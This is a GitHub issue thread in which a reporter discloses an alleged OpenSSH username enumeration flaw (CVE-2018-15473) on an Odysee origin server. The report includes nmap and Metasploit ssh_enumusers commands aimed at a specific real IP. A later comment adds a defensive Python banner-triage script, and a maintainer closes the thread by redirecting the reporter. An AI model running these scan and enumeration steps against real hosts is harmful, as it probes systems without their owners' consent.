lbryio / lbry-sdk

The LBRY SDK for building decentralized, censorship resistant, monetized, digital content apps.
https://lbry.com
MIT License
7.19k stars 482 forks

BUG REPORT (1): OPEN SSH USERNAME ENUMERATION VULNERABILITY (CVE-2018-15473) #3524

Closed fozi6044 closed 2 years ago

fozi6044 commented 2 years ago

URL: https://odysee.com/

DESCRIPTION:

I found a vulnerability in your website. I found an origin IP 148.251.103.17 from Shodan which is redirected to https://odysee.com/, and I scanned your origin IP with nmap, in which port 22 is open with version OpenSSH 7.6p1 Ubuntu 4ubuntu0.5, which contains an SSH username enumeration vulnerability on your network. I used the Metasploit tool for the exploitation of this vulnerability.

Steps to Reproduce:

1) I scanned an IP with nmap: nmap -sV 148.251.103.17
3) Found port 22 is opened with vulnerable OpenSSH 7.6p1 Ubuntu 4ubuntu0.5

Exploitation with Metasploit

4) msfconsole -q
5) search ssh_enumusers
6) use 0
7) set RHOSTS 148.251.103.17
8) set USER_FILE /usr/share/legion/wordlists/ssh-user.txt
9) You can see I found usernames root, sysop, superuser, admin, administrator etc.

[screenshot: msfconsole]

Remediation:

https://raaviblog.com/how-to-fix-openssh-username-enumeration-vulnerability-cve-2018-15473-identified-by-qualys-scan/

Impact:

The attacker can get a list of users available on the SSH server.

Kind Regards,
Muhammad Fauzan
Cyber Security Consultant
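For whoever has to triage a report like the one above, the first question is whether the version in the banner is actually in the affected range, and whether the number can be trusted at all. CVE-2018-15473 affects upstream OpenSSH releases through 7.7 and was fixed in 7.8, but distributions backport fixes without changing the upstream number, so a banner such as "OpenSSH_7.6p1 Ubuntu-4ubuntu0.5" can only be judged against the vendor's package changelog or advisory, not against the upstream version alone. The following is an added triage helper written for this thread (it is not part of lbry-sdk or of the reporter's tooling): it parses an SSH banner or an nmap -sV service line, compares the upstream version with the 7.8 fix boundary, and flags banners that carry a distribution suffix as needing a vendor check rather than an automatic "vulnerable" verdict. The sample lines are constructed; the 7.6p1 Ubuntu string is the one quoted in the report.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# CVE-2018-15473 is a user-enumeration flaw in upstream OpenSSH through 7.7;
# the fix shipped in OpenSSH 7.8.  Versions below this tuple are affected upstream.
UPSTREAM_FIXED = (7, 8)

# Matches both raw banners ("SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.5") and
# nmap -sV service lines ("22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (...)").
BANNER_RE = re.compile(
    r"OpenSSH[_ ](?P<major>\d+)\.(?P<minor>\d+)(?:p(?P<patch>\d+))?(?P<rest>.*)"
)


@dataclass
class BannerVerdict:
    version: Tuple[int, int]      # upstream (major, minor) parsed from the banner
    distro_suffix: str            # e.g. "Ubuntu-4ubuntu0.5", empty for vanilla builds
    upstream_affected: bool       # True if the upstream number predates the 7.8 fix
    needs_vendor_check: bool      # True if a distro suffix means the number may be backported
    note: str


def triage_banner(line: str) -> BannerVerdict:
    """Classify one SSH banner / nmap service line for CVE-2018-15473 exposure."""
    m = BANNER_RE.search(line)
    if not m:
        raise ValueError(f"no OpenSSH version found in: {line!r}")

    version = (int(m["major"]), int(m["minor"]))
    # Drop parentheticals nmap appends ("(Ubuntu Linux; protocol 2.0)") so that
    # only the vendor package suffix, if any, remains.
    distro_suffix = re.sub(r"\(.*?\)", "", m["rest"]).strip()

    upstream_affected = version < UPSTREAM_FIXED
    needs_vendor_check = upstream_affected and bool(distro_suffix)

    if needs_vendor_check:
        note = (
            "upstream number predates the 7.8 fix, but the distribution suffix "
            "means the fix may have been backported: confirm against the vendor "
            "advisory / package changelog before reporting"
        )
    elif upstream_affected:
        note = "vanilla build predating the 7.8 fix: treat as affected"
    else:
        note = "upstream version includes the fix"

    return BannerVerdict(version, distro_suffix, upstream_affected, needs_vendor_check, note)


def triage_scan(lines: List[str]) -> List[BannerVerdict]:
    """Run triage over every line that carries an OpenSSH version; skip the rest."""
    return [triage_banner(l) for l in lines if BANNER_RE.search(l)]


# Constructed sample input (not real scan output) mixing banner and nmap formats.
SAMPLE_LINES = [
    "SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.5",                # the string quoted in the report
    "22/tcp open ssh OpenSSH 7.4 (protocol 2.0)",              # vanilla build, affected
    "22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)",
    "80/tcp open http nginx",                                  # ignored: no OpenSSH version
]

if __name__ == "__main__":
    for verdict in triage_scan(SAMPLE_LINES):
        print(f"{verdict.version} {verdict.distro_suffix or '<vanilla>'}: {verdict.note}")
```

The point of the needs_vendor_check flag is that a banner-only scanner (nmap, a Metasploit module, a Qualys-style check) will report the Ubuntu 7.6p1 build as vulnerable purely on the upstream number; the package suffix is the cue that the verdict has to come from the distribution's advisory, which is the check the report above never performed.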

tzarebczan commented 2 years ago

This is not the right repo for these reports. Please use security@odysee.com